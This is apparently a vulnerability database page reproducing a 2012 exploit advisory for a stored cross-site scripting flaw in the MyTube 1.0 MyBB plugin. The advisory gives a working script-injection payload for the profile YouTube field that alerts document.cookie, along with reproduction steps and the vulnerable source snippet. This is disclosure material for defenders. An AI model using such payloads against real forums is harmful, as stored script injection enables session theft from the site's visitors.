Lucene search
K

MyBB MyTube 1.0 Cross Site Scripting

🗓️ 18 Dec 2012 00:00:00Reported by Kim Kun BumType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 13 Views

MyTube MyBB Plugin Stored XSS, Lack of input validation in Youtube ID field, Stored XSS-vulnerabilities, Execute injected script on profile visi

Code
`# Exploit Title: MyTube MyBB Plugin Stored XSS  
# Date: 18/12/2012  
# Exploit Author: Kim Kun Bum  
# Vendor by:  
# Software Link: http://mods.mybb.com/view/mytube  
# Version: 1.0  
# Category:Web Security  
# Tested on: Windows7  
Reason : Lack of input validation in Youtube ID field  
+--------------------------------------------------------------------------+  
Stored XSS-vulnerabilities  
0. install&Activate plugin  
1. go to Usercp >> Edit Profile >> Youtube:  
2. inject following code  
"http://www.youtube.com?v="</embed> <script> alert(document.cookie) </script>  
3. This code will be stored as profile content.  
4. Visit your profile and Can see the execution of injected script  
Vulnerable code in mytube.php soucre :  
function mytube_activate(){....<embed src="http://www.youtube.com/v/{$tubeid}{$autoplay}" type="application/x-  
shockwave-flash" wmode="transparent" width="425" height="344"></embed></object></td></tr>}  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation